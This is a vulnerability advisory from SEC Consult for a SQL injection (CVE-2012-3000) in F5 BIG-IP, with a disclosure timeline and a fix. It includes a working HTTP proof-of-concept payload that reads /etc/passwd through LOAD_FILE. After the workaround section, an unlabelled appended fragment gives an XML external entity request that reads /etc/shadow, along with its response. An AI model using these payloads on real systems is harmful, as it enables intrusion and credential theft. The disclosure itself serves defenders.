F5 BUGS

SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >

=======================================================================

title: SQL Injection

product: F5 BIG-IP

vulnerable version: <=11.2.0

fixed version: 11.2.0 HF3

11.2.1 HF3

CVE number: CVE-2012-3000

impact: Medium

found: 2012-09-03

by: S. Viehb枚ck

SEC Consult Vulnerability Lab

<a href="https://www.sec-consult.com/">https://www.sec-consult.com</a>

Vendor/product description:

---------------------------

"The BIG-IP product suite is a system of application delivery services that

work together on the same best-in-class hardware platform or software virtual

instance. From load balancing and service offloading to acceleration and

security, the BIG-IP system delivers agility聴and ensures your applications

are fast, secure, and available."

Vulnerability overview/description:

-----------------------------------

A SQL injection vulnerability exists in a BIG-IP component. This enables an

authenticated attacker to access the MySQL database with the rights of MySQL

user "root" (= highest privileges).

Furthermore an attacker can access files in the file system with the rights of

the "mysql" OS user.

Proof of concept:

-----------------

The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1

Host: bigip

Cookie: BIGIPAuthCookie=*VALID_COOKIE*

Content-Length: 119

{

"id": 2,

"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --

x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting

data.

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK

...

{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}

Vulnerable / tested versions:

-----------------------------

The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.

Successful exploitation was possible with Application Security (ASM) or Access

Policy (APM) enabled.

Vendor contact timeline:

------------------------

2012-10-04: Sending advisory draft and proof of concept.

2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and

11.2.1 HF3.

2013-01-22: SEC Consult releases coordinated security advisory.

Solution:

---------

Update to 11.2.0 HF3 or 11.2.1 HF3.

Workaround:

-----------

No workaround available.

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1

Content-Length: 143

&lt;?xml version="1.0" encoding='utf-8' ?&gt;

&lt;!DOCTYPE a [&lt;!ENTITY e SYSTEM '/etc/shadow'&gt; ]&gt;

&lt;message&gt;&lt;dialogueType&gt;&amp;e;&lt;/dialogueType&gt;&lt;/message&gt;

The response includes the content of the file:

&lt;?xml version="1.0" encoding="utf-8"?&gt;

&lt;message&gt;&lt;dialogueType&gt;any&lt;/dialogueType&gt;&lt;status&gt;generalError&lt;/status&gt;&lt;command&gt;any&lt;/command&gt;&lt;accessPolicyName&gt;any&lt;/accessPolicyName&gt;&lt;messageBody&gt;&lt;generalErrorText&gt;Client

has sent unknown dialogueType '

root:--hash--:15490::::::

bin:*:15490::::::

daemon:*:15490::::::

adm:*:15490::::::

lp:*:15490::::::

mail:*:15490::::::

uucp:*:15490::::::

operator:*:15490::::::

nobody:*:15490::::::

tmshnobody:*:15490::::::

admin:--hash--:15490:0:99999:7:::